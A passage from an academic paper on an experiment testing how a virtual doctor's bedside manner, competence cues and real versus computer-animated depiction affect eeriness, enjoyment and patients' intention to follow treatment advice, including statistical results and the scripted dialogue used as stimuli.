Outcome, and Realism. Each variable had a high and a low level. These constituted the eight treatment conditions. Character Dr. Richards’s Character was reflected in his bedside manner, which was either good or poor. Character was represented by approximately 40% of the doctor’s dialogue. The good-manner treatments included expressions of caring, encouragement, praise, and confidence in the patient and treatment, offers of availability and support, and recommendations of external resources. The poor-manner treatments included complaining about others, using disparaging and offensive language, showing a lack of availability, demeaning and discouraging the patient, cracking a joke at the patient’s expense, and assuming the patient had petrifying fears and ingrained habits. Dr. Richards’ remaining dialogue (337 of 553–561 words) was identical between the good-manner and poor-manner conditions. In this dialogue, Dr. Richards interpreted the patient’s test results as possibly indicating diabetes and invited the patient for a retest. He also explained type 1 and type 2 diabetes and their symptoms, complications, biological mechanism, and treatments. Outcome Dr. Richards’ Outcome is either a fellowship or a malpractice lawsuit. A high- and low-competence subplot was set up immediately before the virtual consultation. First, the participant overheard another patient in the waiting room discussing a malpractice lawsuit, and subsequently the nurse called the patient back and mentioned that the doctor is up for an award. These events were framed more or less favorably in the high or low competence versions, respectively. The subplot culminated at the end of the consultation. In the high-competence condition, Nurse Larsson announced, “Great news, Dr. Richards! The American College of Physicians is honoring you with a Fellowship!” In the low-competence condition, Nurse Larsson announced, “Bad news, Dr. Richards! Meredith Pratley decided to go ahead with the malpractice lawsuit.” Depiction The Depiction of the entire virtual consultation was either real or computer animated; however, both versions used the same recording, namely, the voice of the actor playing Dr. Richards and off-screen actress playing Nurse Larsson. The high-realism treatment used a recorded video of the actor (Fig. 1). The low-realism treatment used a video of a computer model developed from high-resolution reference photographs of the same actor. The actor’s clothing, props, and environment were all developed the same way. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 6/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ The computer models were animated manually using the real video as a reference. The animated Dr. Richards’ lips were synchronized to the real actor’s speech. The affective lip and eyebrow movements were precisely synchronized to the video by hand but appeared less emphatic. The same computer model had been used in a different scenario and found to be significantly more eerie than the real actor (Patel & MacDorman, 2015). Dependent variables The semantic differential scales comprising the posttest indices are listed in Appendix B. The indices represent unweighted averages of interval measurements from their respective semantic differential scales. The scales were implemented as visual analogue scales (Funke & Reips, 2012; Reips & Funke, 2008). Each scale was represented by an adjective (or phrase) and its antonym on opposite ends of a horizontal bar. The participant had to place a mark on the bar, and depending on where the mark was placed, a decimal value between -1.000 and 1.000 was recorded for that scale. Likert scales were also implemented as visual analogue scales with Strongly Disagree and Strongly Agree on opposite ends of the horizontal bar. Index and scale order were randomized. Warmth and competence Dr. Richards’ warmth and competence were measured using three source credibility indices (McCroskey & Teven, 1999): Goodwill, Trustworthiness, and Competence. Goodwill and Trustworthiness formed a single Warmth index. Human realism and eeriness Dr. Richards’ human realism and eeriness were measured using three source appearance indices: Realism, Humanness, and Eeriness (Ho & MacDorman, 2017). Realism and Humanness formed a single Human Realism index. Adherence intention Intention to adhere to Dr. Richards’ treatment advice was measured using an index designed specifically for this virtual consultation. Enjoyment Narrative appreciation of the consultation was measured using an enjoyment index. To design the enjoyment index, the program evaluation index (Perry et al., 1997) was converted from intensity scales to semantic differential scales by adding antonyms. RESULTS Participants Overall, 738 participants randomly assigned to eight groups, with 88–105 in each group, completed the experiment (73% female, n = 538). As a manipulation check, a subset of 222 participants, with 21–34 in each group, completed additional items measuring source credibility and appearance (70.72% female, n = 157). Recruitment period and baseline The experiment was conducted from January 15 to March 10, 2018. Most participants grew up in the US (88%, n = 647). They ranged in age from 18 to 82 (Mdn = 23, IQR = (20, 29)). Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 7/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Data analysis preliminaries Test statistics were two tailed and interpreted at a 0.05 significance level. Partial eta squared (gp 2) was interpreted with small = 0.01, medium = 0.06, and large = 0.14 thresholds (Cohen, 1973) and Cronbach’s a with acceptable = 0.7, good = 0.8, and excellent = 0.9 thresholds. Factor analysis used oblimin rotation and parallel analysis for the number of factors. All betas (β) were standardized. Correlations and path analysis of the structural models were performed in Lavaan 0.6, and other analyses in Jamovi 0.9. Index reliability Goodwill and Trustworthiness scales loaded on the same factor and together comprised Warmth. Realism and Humanness scales loaded on the same factor and together comprised Human Realism. Three scales not contributing to reliability were removed, specifically, Without definite lifespan—Mortal was removed from Human Realism, Uninspiring—Spine-tingling was removed from Eeriness, and item 7 was removed from Adherence Intention (Appendix B). The revised Human Realism, Eeriness, and Adherence Intention indices were used in the analyses. All indices showed internal reliability (Table 1). Manipulation checks As described below, the manipulation checks found that Warmth, Competence, and Human Realism varied as expected; however, Character also increased Competence and decreased Eeriness. Depiction had a nonsignificant effect on Eeriness, thus indicating that the Eeriness manipulation check was unsuccessful. Using Pillai’s trace, a three-way MANOVA found a significant effect of Character, V = 0.54, F(4, 211) = 62.37, p < 0.001, and Depiction, V = 0.17, F(4, 211) = 11.18, p < 0.001, on the manipulation check variables. Separate univariate ANOVAs were conducted to test the main and interaction effects of Character, Outcome, and Depiction on Warmth, Competence, Human Realism, and Eeriness (Table 2). Character had a significant main effect on Warmth, Competence, and Eeriness with large effect sizes. Post hoc tests (Tukey’s HSD) showed that the good-manner doctor was rated significantly higher than the poor-manner doctor on Warmth and Competence and significantly lower on Eeriness. Character � Outcome interaction effect on Competence was significant with a small effect size, SS = 0.70, F = 4.63, p = 0.033, h2p = 0.02. Table 1 Psychometric properties of the dependent variables. DV Items N M SD α Skew Warmth 12 222 -0.12 0.49 0.97 0.09 Competence 6 222 .19 0.44 0.93 –0.47 Human Realism 7 222 -0.28 0.38 0.86 0.28 Eeriness 7 222 -0.02 0.32 0.73 0.14 Adherence Intention 7 738 .08 0.43 0.87 –0.20 Enjoyment 12 738 -0.20 0.35 0.90 0.16 Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 8/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Outcome had a significant effect on Competence with a small effect size. The high-competence doctor (awarded fellowship) was rated significantly higher than the low-competence doctor (malpractice lawsuit) on Competence. Depiction had a significant effect on Human Realism with a medium effect size but a nonsignificant effect on Eeriness. The high-realism doctor was rated higher than the low-realism on Human Realism. Regression analysis Multiple linear regression was performed to predict Adherence Intention from Warmth, Competence, Human Realism, Eeriness, and Enjoyment. Although the first model was significant, F(5, 216) = 67.9, p < 0.001, R2 = 0.61, adj. R2 = 0.60, Enjoyment was nonsignificant, t = 1.52, p = 0.129, β = 0.08, and it was removed from the second model. Furthermore, the second model was significant, F(4, 217) = 83.7, p < 0.001, R2 = 0.61, adj. R2 = 0.60, but Human Realism was nonsignificant, t = -1.33, p = 0.192, β = -0.06, and it was removed from the third model, which had the best fit, F(3, 218) = 111.0, p < 0.001, R2 = 0.60, adj. R2 = 0.60 (Table 3). Warmth and Competence predicted Adherence Intention with medium-to-large effect sizes while Eeriness inversely predicted Adherence Intention with a small effect size. Hypotheses testing Using Pillai’s trace, a three-way MANOVA found a significant effect of Character, V = 0.28, F(2, 729) = 143.78, p < 0.001, Depiction, V = 0.02, F(2, 729) = 7.36, p < 0.001, and Outcome, V = 0.02, F(2, 729) = 6.40, p = 0.002 on dependent variables. Separate univariate ANOVAs were conducted to test the main and interaction effects of Character, Outcome, and Depiction on Adherence Intention and Enjoyment. All main effects were significant (Table 4). No significant interaction effects were found. Table 2 ANOVAs of Character, Outcome, and Depiction on Warmth, Competence, Human Realism, and Eeriness. IV DV SS F p ηp2 Mdiff SE df t ptukey Character Warmth 24.25 193.99 <0.001 0.48 0.67 0.05 214 13.9 <0.001 Competence 7.83 52.10 <0.001 0.20 0.38 0.05 214 7.2 <0.001 Human Realism 0.04 0.30 0.584 Eeriness 3.54 41.33 <0.001 0.16 –0.26 0.04 214 –6.4 <0.001 Outcome Warmth 0.24 1.94 0.165 Competence 0.69 4.59 0.033 0.02 0.11 0.05 214 2.1 0.033 Human Realism 0.02 0.13 0.724 Eeriness 0.00 0.01 0.917 Depiction Warmth 0.38 3.04 0.083 Competence 0.52 3.46 0.064 Human Realism 2.64 19.66 <0.001 0.08 –0.22 0.05 214 –4.4 <0.001 Eeriness 0.01 0.17 0.680 Note: N = 222. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 9/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ H1 predicted that the high-warmth source will be more persuasive than the low-warmth source. The main effect of Character on Adherence Intention was significant and large. In the narrative, intention to adhere to the treatment advice of the doctor with good bedside manner was greater than intention to adhere to the treatment advice of the doctor with poor bedside manner (Fig. 2). Thus, H1 was supported. H2 predicted that the high-competence source will be more persuasive than the low-competence source. The main effect of Outcome on Adherence Intention was significant but small. Intention to adhere to the treatment advice of the doctor awarded the fellowship was greater than intention to adhere to the treatment advice of the doctor sued for malpractice. Thus, H2 was supported. Table 3 Regression model coefficients for Adherence Intention. Predictor B SE β t p Intercept 0.12 0.02 4.77 <0.001 Warmth 0.40 0.06 0.48 6.69 <0.001 Competence 0.27 0.06 0.29 4.51 <0.001 Eeriness -0.14 0.07 -0.11 –2.11 0.036 Note: N = 222. Table 4 ANOVAs of Character, Outcome, and Depiction on Adherence Intention and Enjoyment. IV DV SS F p ηp 2 Mdiff SE df t ptukey Character Adherence Intention 37.14 282.86 <0.001 0.28 0.45 0.03 730 16.8 <0.001 Enjoyment 1.94 16.59 <0.001 0.02 0.10 0.03 730 4.1 <0.001 Outcome Adherence Intention 0.78 5.95 0.015 0.01 0.07 0.03 730 2.4 0.015 Enjoyment 1.17 10.01 0.002 0.01 0.08 0.03 730 3.2 0.002 Depiction Adherence Intention 1.07 8.19 0.004 0.01 0.08 0.03 730 2.9 0.004 Enjoyment 1.30 11.06 <0.001 0.02 0.08 0.03 730 3.3 <0.001 Note: N = 738. Depiction (95% CI) Computer Animated Real –0.2 0.0 0.2 0.4 Good Manner Character A d h er en ce In te n ti o n Poor Manner Good Manner Character En jo ym en t Poor Manner –0.4 –0.3 –0.2 –0.1 A B Figure 2 Means and 95% confidence intervals of Adherence Intention and Enjoyment plotted by Character and Depiction. Adherence Intention (A) and consultation Enjoyment (B) were sig- nificantly greater for the doctor with good bedside manner than the doctor with poor bedside manner. Full-size DOI: 10.7717/peerj-cs.168/fig-2 Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 10/29 http://dx.doi.org/10.7717/peerj-cs.168/fig-2 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ H3 predicted that the high-realism source will be more persuasive than the low- realism source. It should be noted that the Realism manipulation check was successful, but the Eeriness manipulation check was not. The main effect of Depiction on Adherence Intention was significant but small. Intention to adhere to the advice of the computer- animated doctor was greater than intention to adhere to the advice of the doctor portrayed by a real human actor. Thus, H3 was not supported. H4 predicted that the consultation will be more enjoyable with the high-warmth source than the low-warmth source. The main effect of Character on Enjoyment was significant but small. The consultation with the doctor with good bedside manner was more enjoyable. Thus, H4 was supported. H5 predicted that consultation will be more enjoyable with the high-competence source than the low-competence source. The main effect of Outcome on Enjoyment was significant but small. The consultation was more enjoyable with the doctor awarded the fellowship. Thus, H5 was supported. H6 predicted that realism will influence enjoyment of the virtual consultation. The main effect of Depiction on Enjoyment was significant but small. The consultation with the computer-animated doctor was more enjoyable. Thus, H6 was supported. Secondary analysis Depiction (high realism) was predicted to reduce Eeriness; however, the results revealed that Depiction actually reduced Enjoyment and that Character (good manner) reduced Eeriness. Surprisingly, Depiction and Eeriness were uncorrelated (Table 5). To explain this, we proposed that enjoyment of the consultation with the computer- animated Dr. Richards interfered with the measurement of Eeriness. However, this interference appeared to be indirect because, although Enjoyment and Eeriness were significantly correlated, only Human Realism and Warmth were significant predictors of Eeriness in a regression model. Similarly, only Eeriness and Enjoyment were significant predictors of Warmth; only Warmth, Human Realism, and Depiction were significant predictors of Enjoyment; and only Enjoyment, Eeriness, and Depiction were significant predictors of Human Realism. Each of these four regression models can be represented by a causal directed graph with an arrow from each predictor variable to the outcome variable. Each of these four graphs could contribute variables and edges to a Table 5 Correlations for analysis of path models of Warmth. Variables Warmth Eeriness Enjoyment Human Realism Depiction Warmth — Eeriness -0.55*** — Enjoyment 0.48*** -0.19** — Human Realism 0.29*** -0.31*** 0.47*** — Depiction -0.14* 0.00 -0.22** 0.29*** — Notes: N = 222. * p < 0.05. ** p < 0.01. *** p < 0.001. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 11/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ larger directed graph. Thus, the variables and edges of these graphs identified the potential set of path models we sought to analyze by structural equation modeling. A direct effect, represented by an arrow, is a hypothesized relation between two variables. The strength of this relation is a free parameter, which is estimated during model identification. The absence of an arrow between two variables is a fixed parameter (fixed to 0). A nonsignificant p-value of a free parameter indicates poor local fit. An upper bound on the number of free parameters was set at 11 by applying the N:q rule, which recommends a minimum 20:1 ratio of sample size to free parameters (Jackson, 2003). By the parsimony principle, we specified the simplest model with the highest priority effect first and then proceeded to specify more complex models as necessary by adding direct effects (Kline, 2016). The simplest model, Model 0, had a direct effect from the independent variable Depiction to Eeriness. This model was rejected because the local fit was nonsignificant (β = 0.00, p = 0.966). In Model 1, Depiction had a direct effect on Human Realism, and Human Realism had a direct effect on Eeriness. Model 1 is shown in Fig. 3. The green arrow indicates a Depiction 1.00 Enjoyment–0.22 Human Realism 0.41 0.95 0.56 Warmth 0.39 0.62 Eeriness –0.31 0.90 –0.48 0.56 Model 4 Depiction 1.00 Enjoyment–0.22 Human Realism 0.41 0.95 0.56 Warmth0.62 Eeriness –0.31 0.90 –0.55 0.70 Model 3 Model 2 Depiction 1.00 Enjoyment–0.22 Human Realism 0.41 0.95 0.56 0.62 Eeriness –0.31 0.90 Model 1 Depiction 1.00 Human Realism 0.29 0.92 Eeriness –0.31 0.90 Figure 3 Path models of the indirect effect of Enjoyment of computer animation on Eeriness. In the path models, the green arrow indicates a positive direct effect, the red arrow indicates a negative direct effect, and the standardized estimate (β) indicates the strength of the effect. The independent variable Depiction, indicating computer animated or real, is the exogenous variable. In Model 2, 3, and 4, Enjoyment mitigated Eeriness by increasing Human Realism. All models had good local fit, but only Model 2 and 4 had good global fit (Table 6). Model 4 is the final model. Full-size DOI: 10.7717/peerj-cs.168/fig-3 Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 12/29 http://dx.doi.org/10.7717/peerj-cs.168/fig-3 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ positive direct effect, the red arrow indicates a negative direct effect, and the width of each arrow indicates the magnitude of the direct effect. The strength of the direct effects is indicated by the standardized estimate (β) next to the green arrow and the red arrow. All estimates were significant (ps � 0.001), and all of the following criteria for acceptable global fit were met: p > 0.05 (cannot reject the exact fit hypothesis), RMSEA � 0.08 (a cutoff for marginal fit; MacCallum, Browne & Sugawara, 1996), RMSEA êL = 0 (confidence interval includes zero), and the combination rule (CFI � 0.95 and SRMR � 0.08; Hu & Bentler, 1999). However, Model 1 excludes the theoretically important variable Enjoyment. Table 6 lists the global fit statistics for this and subsequent path models. For Model 2, all estimates were significant (ps � 0.001), and all global fit criteria were met. However, Model 2 excludes the theoretically important variable Warmth. Model 3 added a direct effect from Eeriness to Warmth (β = -0.55, p < 0.001). Although estimates were significant (ps � 0.001), none of the global fit criteria were met. Thus, Model 3 was rejected. Model 4 added a direct effect from Enjoyment to Warmth (β = 0.39, p < 0.001). All estimates were significant (ps � 0.001), and all global fit criteria were met. Thus, Model 4 was accepted. It is our final model. As a best practice, it is recommended to compare the final model with theoretically plausible alternative models (Kline, 2016). Model 4 was compared with two alternative models by switching the direction of the direct effect between Eeriness and Warmth (Model 4a) and between both Eeriness and Warmth and Enjoyment and Human Realism (Model 4b). Although all estimates were significant (ps � 0.003) for these models, Model v2 and RMSEA global fit criteria were unmet. Thus, these alternative models were rejected. Data availability All datasets and R scripts for the analyses are available as Supplemental Material. DISCUSSION Each year, nonadherence costs the US healthcare system more than $300 billion and results in 250,000 deaths (Balkrishnan, 2005; Benjamin, 2012). The global human and financial costs are far greater (Cutler et al., 2018). Real clinicians are a limited resource Table 6 Global fit statistics for path models of Eeriness (1, 2) and of Eeriness and Warmth (3, 4, 4a, 4b). Model Model x2 q RMSEA CFI SRMR xM 2 dfM p :̂ 90% CI 1 2.357 1 0.125 7 0.078 [0.000, 0.213] 0.967 0.038 2 2.393 2 0.302 6 0.030 [0.000, 0.140] 0.997 0.033 3 56.812 5 0.000 9 0.216 [0.168, 0.268] 0.807 0.122 4 4.162 4 0.385 10 0.014 [0.000, 0.103] 0.999 0.040 4a 12.316 4 0.015 10 0.097 [0.038, 0.161] 0.969 0.039 4b 12.316 4 0.015 10 0.097 [0.038, 0.161] 0.969 0.039 Note: q, number of free parameters; CI, confidence interval. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 13/29 http://dx.doi.org/10.7717/peerj-cs.168#supplemental-information http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ (Chang et al., 2012; Pickersgill, 2001; Sklar, 2013) as many countries are facing a shortage of physicians, nurses, and other healthcare professionals (Bodenheimer, Chen & Bennett, 2009; Bodenheimer & Smith, 2013; Colwill, Cultice & Kruse, 2008; Potempa, Redman & Landstrom, 2009). These shortages reduce opportunities for the clinical supervision of patients, allowing their nonadherence to increase negative health outcomes. Developing virtual consultations to promote adherence could improve patient health while reducing healthcare costs and usage (Roebuck et al., 2011). Virtual consultations that use real-time computer animation have many advantages over films and other more traditional interventions. Animated virtual consultations can be revised quickly for immediate distribution on the Internet (e.g., using software for real-time animation or video capture in a game engine). Without hiring actors, virtual clinicians can be adapted to different conditions and treatments, internationalized and localized to different languages and cultures, and tailored to the patient’s demographic group (DeSmet et al., 2014). The controllability of virtual humans and reproducibility of their behavior make virtual consultations an effective platform for experiments investigating clinical interactions. Because virtual humans can assume the patient’s role, they can also be used to teach and assess clinical and communication skills (Cook & Triola, 2009; Parsons et al., 2008; Persky, 2011; Persky & Eccleston, 2011). Thus, using computer-animated healthcare providers in clinical settings offers a promising, cost-effective approach to increase patients’ health literacy and adherence to treatment advice (Bickmore, Pfeifer & Jack, 2009; Bickmore et al., 2010b). As predicted, good bedside manner and a subplot highlighting the doctor’s competence increased intention to adhere to treatment advice among role-playing participants in a hypothetical virtual consultation. Surprisingly, adherence intention was lower for the doctor portrayed by a real human actor than by his digital double. Thus, the uncanny valley phenomenon posed no threat to the effectiveness of the intervention. On the contrary, the computer-animated doctor increased adherence intention and consultation enjoyment significantly more than the real human. Contrary to our previous study, the same digital double used in Patel & MacDorman (2015) was no more eerie than the same human actor, although eeriness predicted lower warmth. We believe that enjoyment of the animation caused the doctor to be perceived as warmer and more human, which mitigated the negative effects of eeriness associated with the uncanny valley. This explanation is compatible with a path model derived from the data. Notably, poor bedside manner increased eeriness. Limitations and future work The results identified two potential threats to internal validity owing to the methodology. First, the measurement of eeriness was affected by character traits, such as warmth and competence. For example, the doctor with poor bedside manner was rated significantly eerier than the doctor with good bedside manner. The eeriness index was designed to measure eeriness caused by the uncanny valley, which is typically exhibited by inconsistencies in human realism, and not by a cold personality (Ho & MacDorman, 2010). The same computer-animated model that was rated eerier than its human counterpart Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 14/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ in Patel & MacDorman (2015) was not significantly different in the present study. This may indicate how cues about character traits can dilute an index intended to measure eeriness (Zibrek, Kokkinara & McDonnell, 2018). To control for the compounding effects of the doctor’s bedside manner and outcome on eeriness, the experiment could administer eeriness scales in a pretest: participants would rate the doctor portrayed by either a real human actor or his digital double in a neutral setting— without any cues on warmth, coldness, competence, or incompetence, and before the narrative is introduced. A second threat to internal validity concerns difficulty in separating computer animation’s positive contribution to adherence intention and consultation enjoyment from the uncanny valley’s possible negative contribution. This can be achieved by employing two versions of the computer-animated doctor, one with greater inconsistency in human realism than the other. Thus, a follow-up experiment could control for the compounding effects of computer animation on enjoyment by independently varying aspect aspects of animation found to modulate eeriness. A threat to external validity is the use of role-playing participants instead of participants who fit the scenario, namely, patients in the initial stage of being diagnosed with type 2 diabetes. A number of studies suggest our results may generalize to actual patients. Baylor et al. have found animated pedagogical agents to be effective in increasing motivation and learning (Baylor, 2009, 2011; Baylor & Kim, 2005; Baylor & Ryu, 2003; Kim, Baylor & Shen, 2007; Plant et al., 2009). Reviews of the literature have found interactive media with immersive narratives to be effective in promoting behavior change and in improving health outcomes (Baranowski et al., 2008; DeSmet et al., 2014; Lu et al., 2012; Read & Shortell, 2011; Thompson, 2012). Interpreting the results of the present study in light of these findings, we believe a computer-animated doctor could be effective in clinical settings. Therefore, to confirm effectiveness, a follow-up experiment should be conducted with clinical patients. However, substantial changes to the script would be required to ensure patients assigned to the low warmth and low competence conditions were not harmed relative to current best practices. In addition, certain dramatic elements of the script would need to be revised to render it medically accurate and ethical to employ in a clinical setting. CONCLUSIONS The uncanny valley is the experience of perceiving simulated humans as eerie (Mangan, 2015). Mori (2012), who proposed the theory in 1970, attributed the phenomenon to some features of the simulation appearing more human than others. Several empirical studies support his claim (Chattopadhyay & MacDorman, 2016; MacDorman et al., 2009; MacDorman & Chattopadhyay, 2016; Mitchell et al., 2011; Seyama & Nagayama, 2007). This study examined the uncanny valley in a hypothetical virtual consultation, casting in the role of doctor either a real human actor or his digital double. With the exception of Patel & MacDorman (2015), previous experiments on how human realism affects persuasion have not considered the uncanny valley. Further, they Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 15/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ have lacked the experimental control of using a digital double to simulate the appearance and behavior of a real human. No previous study has addressed these issues with respect to a patient’s intention to adhere to treatment advice. The findings show the effectiveness of a digital double relative to a real human in promoting adherence intention with role-playing participants. In addition, they show increased enjoyment of the consultation with the computer-animated doctor, which could indicate future acceptance of the technology. Cues of the doctor’s warmth and competence remained effective despite the use of realistic computer animation. Thus, insofar as the uncanny valley may have come into play, it did not impede the effectiveness of the computer-animated virtual consultation. Patient nonadherence to treatment poses a major threat to public health (Iuga & McGuire, 2014; Vermeire et al., 2001). Our findings suggest that an animated virtual consultation could be more effective and enjoyable than a consultation filmed with a real human actor. Further testing is needed in clinical settings. The effectiveness of the animated virtual consultation with role-playing participants should encourage the development and clinical testing of this technology, which has advantages over creating content with human actors, such as ease of scenario revision, internationalization, localization, personalization, and web distribution (Bickmore, Pfeifer & Jack, 2009; Bickmore, Pfeifer & Paasche-Orlow, 2009; Bickmore et al., 2010a; DeSmet et al., 2014). APPENDIX A: SCRIPT [Text introducing the narrative]. Outcome Treatment 1 Both conditions: One afternoon, you visit Dr. Richards, a primary care physician, for a routine physical examination. As instructed by the nurse, Jane Larsson, you ate nothing on the morning of your appointment. Low Competence: In the waiting room, two women are seated together, and you hear one of them say, “Meredith, you deserve compensation. You have a strong case.” High Competence: In the waiting room, you overhear a patient, Meredith Pratley, tell her husband, “The lawyer says, if we sue the doctor, we both could make a ton of money.” Both conditions: After the examination, you learn from Dr. Richards that your blood sugar tested higher than normal. You undergo some further blood work and return to the waiting room. After a while, Nurse Larson calls you back into the doctor’s office. Low Competence: Walking to the office, the nurse whispers, “Dr. Richards is up for an award. I’m sure it will go to his head!” High Competence: Walking to the office, the nurse gushes, “Dr. Richards is up for an award. Today we find out the result!” You are greeted by Dr. Richards. [Depiction Treatment: The virtual consultation begins with either computer animation or a recorded video]. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 16/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Character Treatment 1 Dr. Richards, Poor Manner: [Rolling eyes peevishly and shaking head]. How’d you like our noisy waiting room? It sounds like the ghetto clinic where Dr. Mehta volunteers. And they’re all here for me. I inherited this disaster when she took maternity leave so : : : Dr. Richards, both conditions: I’m sorry you were kept waiting. From your latest blood work, your fasting blood sugar level is 203, which is higher than we’d like to see. If it tests above 126 again, we’ll have to consider the possibility that you have diabetes. Dr. Richards, Good Manner: But don’t be too concerned. It’s not clear you have it, and even if you do, it’s very common, and we know how to treat it. [Participant selects a response]. A) What is the chance I have diabetes? B) When will you know for sure whether I have diabetes? C) Will you retest my blood glucose level today? D) Do my other lab results also indicate diabetes? Character Treatment 2 Dr. Richards, Good Manner: Again, I wouldn’t be too concerned because although : : : Dr. Richards, both conditions: Your hemoglobin A1C and triglycerides are elevated. These might be signs of diabetes or a prediabetic condition. To be sure, we’ll need to retest you. Come back at least 12 hours after taking a meal without processed sugar. I want you to get the results fast, so I’ll fit you in tomorrow : : : Dr. Richards, Poor Manner: If somebody cancels. Right now, I have to reserve my one open slot for a true emergency. [Participant selects a response]. A) What should I know about diabetes? B) What type of diabetes do I have? C) Is it more likely I have type 1 or type 2 diabetes? D) What is the difference between type 1 and type 2 diabetes? Character Treatment 3 Dr. Richards, Poor Manner: You should know [chuckling] it doesn’t really matter what type of diabetes you have because : : : Dr. Richards, both conditions: Diabetes, both type 1 and 2, involves your blood sugar being high enough to put your health at risk. This is due to a lack of insulin. In type 1 your body doesn’t make any insulin, because the cells that make it in the pancreas have been killed by the immune system. In type 2 your body makes some insulin, but it’s either not enough or not used well. For both types, the most common symptoms are excessive thirst and frequent urination. If it turned out you had diabetes, it’s probably type 2, because of the late onset. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 17/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Dr. Richards, Good Manner: I certainly hope you have neither type, but type 2 is less severe and easier for us to treat. [Participant selects a response]. A) I don’t feel thirsty that often. B) I don’t urinate very frequently. C) Do you have to feel thirsty and urinate frequently to have diabetes? D) I only have one of those symptoms. Character Treatment 4 Dr. Richards, Poor Manner: [Incredulous]. If you’re like most patients, you don’t know how to assess your own symptoms and : : : Dr. Richards, both conditions: It’s possible to show no symptoms. A third of those with diabetes don’t even know they have it. But it’s important to get treated to keep the symptoms from developing and to prevent complications. Dr. Richards, Good Manner: I’m glad to say there are many treatments today that didn’t exist 20 years ago. Our understanding of the condition is constantly improving. [Participant selects a response]. A) What complications are caused by diabetes? B) What can I do to prevent complications related to diabetes? C) How does the disease progress? D) Do the complications of type 2 diabetes differ from type 1? Character Treatment 5 Dr. Richards, Poor Manner: [Checks time on watch and scoffs] Look : : : Dr. Richards, both conditions: The same complications are associated with both types: heart disease; kidney disease; blindness; a shortened lifespan. However, their risk can be greatly reduced with the right treatment. Dr. Richards, Good Manner: So, don’t worry. If you have any health issues, we’ll do [emphatically] everything we can to help you. [Participant selects a response]. A) How does diabetes cause blindness? B) Why would high blood sugar shorten my life? C) How is a lack of insulin related to heart disease? D) How can diabetes lead to kidney disease? Character Treatment 6 Dr. Richards, Good Manner: That condition might happen, far in the future, to someone who isn’t doing enough to control the disease. [Upbeat tone]. But you’re asking great questions. Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 18/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ Dr. Richards, both conditions: [Rising tone]. How does diabetes cause that? All your organ systems have one thing in common: they rely on proteins to function. If your body doesn’t make enough insulin, sugar binds to those proteins and keep them from working. This is why some people need to inject themselves with insulin. Dr. Richards, Poor Manner: Have you ever made crème brûlée? Take some custard—your proteins—sprinkle on sugar and caramelize it with body heat. [Chuckling] You’re making crème brûlée out of your body. [Participant selects a response]. A) Earlier you mentioned treatment options. B) Could you tell me more about what I can do to improve my prospects? C) Will I have to inject myself with insulin? D) I don’t feel comfortable using needles. Character Treatment 7 Dr. Richards, Poor Manner: [Nodding teasingly]. I bet you’re terrified of needles, but in the early stages of diabetes : : : Dr. Richards, both conditions: Injections aren’t always necessary. Sometimes pills are enough. Getting plenty of exercise and eating a sensible diet are also key in stopping the disease from getting worse. We can discuss lifestyle changes at your next appointment : : : Dr. Richards, Poor Manner: [Impatiently] : : : because I’ve got a waiting room full of people. You see, the trouble is your diet and exercise habits are so ingrained they’re almost impossible for you to change. So you might as well go straight to the pills or needles. [Participant selects a response]. A) What’s wrong with my current diet? B) What kind of diet and exercise program do you recommend? C) I feel I am already exercising enough. D) Is there a type of exercise that is best for people with diabetes? Character Treatment 8 Dr. Richards, Poor Manner: Let’s stop here. The first time you hear [pause] diabetes, you freeze. That’s all you hear. You’re thinking, “I’m going to lose a foot! I’ll go blind!” So there’s really no point in talking about your case now. Take this brochure. Read it before your next appointment, and you’ll be able to ask better-informed questions. Dr. Richards, Good Manner: It’s important to quantify and monitor improvements in diet and exercise, because people tend to underestimate their food intake and overestimate their exercise time. Working with a nutritionist and personal trainer can help with this. You might also consider joining a patient support group. My patients have told me they have learned more in a couple of weeks at a patient support group than in six months of coming to this office, because these groups are run by people who really know what it’s like Dai and MacDorman (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.168 19/29 http://dx.doi.org/10.7717/peerj-cs.168 https://peerj.com/computer-science/ to have the disease. Feel free to contact me if you have any questions or concerns. I look forward to seeing you tomorrow. [Subplot ending]. Outcome Treatment 2 Low Competence: Nurse Larsson: “Bad news, Dr. Richards! Meredith Pratley decided to go ahead with the malpractice lawsuit.” Dr. Richards: “It’s unfortunate she feels that way.” High Competence: Nurse Larsson: “Great news, Dr. Richards! The American College of Physicians is honoring you with a Fellowship.” Dr. Richards: “That is great news!” [Virtual consultation ends]. APPENDIX B: INDICES Indicate your level of agreement with the following statements about Dr. Richards. Goodwill 1. Insensitive—Sensitive 2. Cares about me—Doesn’t care about me R 3. Concerned with me—Not concerned with me R 4. Not 